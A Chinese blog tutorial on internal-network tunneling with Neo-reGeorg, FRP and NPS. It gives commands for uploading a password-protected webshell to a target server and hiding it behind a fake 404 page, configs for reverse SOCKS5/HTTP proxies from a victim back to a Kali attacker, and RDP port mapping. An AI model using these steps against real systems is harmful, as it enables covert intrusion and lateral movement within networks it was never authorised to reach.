内网穿透
NEO-regeorg隐蔽隧道搭建
由python写的一个http代理工具
基本使用
1.设置一个连接密码
python .\neoreg.py generate -k 连接密码 -o 指定输出目录
例如
python .\neoreg.py generate -k passwd
2.再将生成出来的木马文件上传到目标服务器上
3.连接目标 脚本会自动生成一个sockets5的代理映射在本地的1080端口以上供我们使用。
使用sockets5:127.0.0.1:1080即可
python .\neoreg.py -k passwd -u 目标地址 例如 python .\neoreg.py -k passwd -u http://www.tst.com/tunnel.php
#连接的时候发现error 可以使用--skip进行略过开启
python .\neoreg.py -k pass -u http://www.test.com/tunnel.php --skip
关键是有没有包含requests包
pip3 install requests
4.一般来说都是通过200的页面去链接,neoreg可以伪造404页面进行连接
python .\neoreg.py -k passwd --file 404.html --httpcode 404 -o test2
FRP隧道连接
https://github.com/fatedier/frp/releases
1.socks5反向代理
配置服务端
[common]
bind_addr=0.0.0.0
bind_port=1234
[socks5]
type=tcp
remote_port=1080
plugin=socks5
配置客户端
[common]
server_addr=kali's ip
server_port=1234
[socks5]
type=tcp
remote_port=1080
plugin=socks5
proxychains添加socks5代理
2.HTTP的反向代理
配置服务端,将frps以及frps.ini上传到攻击机如下 [common] bind_addr=0.0.0.0 #frp配置监听ip bind_port=1234 #frp配置监听端口 [http_proxy] type=tcp remote_port=1080 #http代理端口 plugin=http_proxy #使用http代理
配置客户端,将frpc和frpc.ini上传到靶机
[common]
server_addr=kali's ip
server_port=1234
[http_proxy]
type=tcp
remote_port=1080
plugin=http_proxy
#利用
frps -c frps.ini
frpc -c frpc.ini
#再添加http代理端口1080
NPS隐蔽隧道搭建
安装启动
NPS分为服务端和客户端,服务端的默认web管理端口是8080,默认账户密码是admin/123
安装启动的命令如下:
服务端:
安装 nps install 启动|关闭|重启 nps start|stop|restart
重新加载配置 nps reload
更新 nps update
客户端
(无配置文件)
连接服务端 npc -server=ip:port -vkey=唯一验证密钥(密钥在服务端配置)
注册到系统服务 npc install -server=ip:port -vkey=唯一验证密钥
启动|关闭|重启 npc start|stop|restart
卸载 nps install
TCP隧道
通过web界面单击上线的客户端,查看选项,配置隧道
访问内网主机的3389端口,通过tcp隧道将内网主机的3389映射到本地的1111
新增-配置目标 192.168.2.2:3389 配置服务端口1111
连接本机的1111连接内网主机的远程桌面 rdesktop 127.0.0.1:1111
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!